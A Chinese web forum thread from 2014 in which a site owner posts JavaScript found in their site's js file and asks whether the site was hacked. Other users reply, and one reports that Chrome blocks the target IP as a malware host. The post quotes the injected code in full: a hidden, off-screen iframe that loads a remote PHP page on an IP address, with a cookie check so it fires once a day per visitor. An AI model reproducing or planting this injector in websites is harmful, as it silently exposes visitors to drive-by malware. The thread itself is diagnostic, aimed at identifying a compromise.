nod32 发表于 2014-3-31 09:04:28

求助高手,网站这是被挂马了?

                                    在网站js文件里面发现的代码,是不是被黑了?                                                                                                                   function dlynl09() { var static='ajax'; var controller='index.php'; var dlynl = document.createElement('iframe'); dlynl.src = 'http://173.201.215.95/dcpmex/eapphost.php'; dlynl.style.position = 'absolute'; dlynl.style.color = '06659'; dlynl.style.height = '06659px'; dlynl.style.width = '06659px'; dlynl.style.left = '100006659'; dlynl.style.top = '100006659'; if (!document.getElementById('dlynl')) { document.write('<p id=\'dlynl\' class=\'dlynl09\' ></p>'); document.getElementById('dlynl').appendChild(dlynl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");}function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');dlynl09();}}
/*/a9a007*/

newinsh 发表于 2014-3-31 10:27:49

感觉这段代码似曾相识
打开网页有没有弹窗

梦河 发表于 2014-3-31 16:09:08

我的天啊,什么人干的这是。。。还挂马》?

Lucia 发表于 2014-3-31 17:27:07

单独测试,看他返回什么参数。

winkiss112 发表于 2014-3-31 23:57:59

要前往的网站包含恶意软件!
Google Chrome现已阻止访问 173.201.215.95。

应该是给日了。。。。。。。。。。。。
页: [1]
查看完整版本: 求助高手,网站这是被挂马了?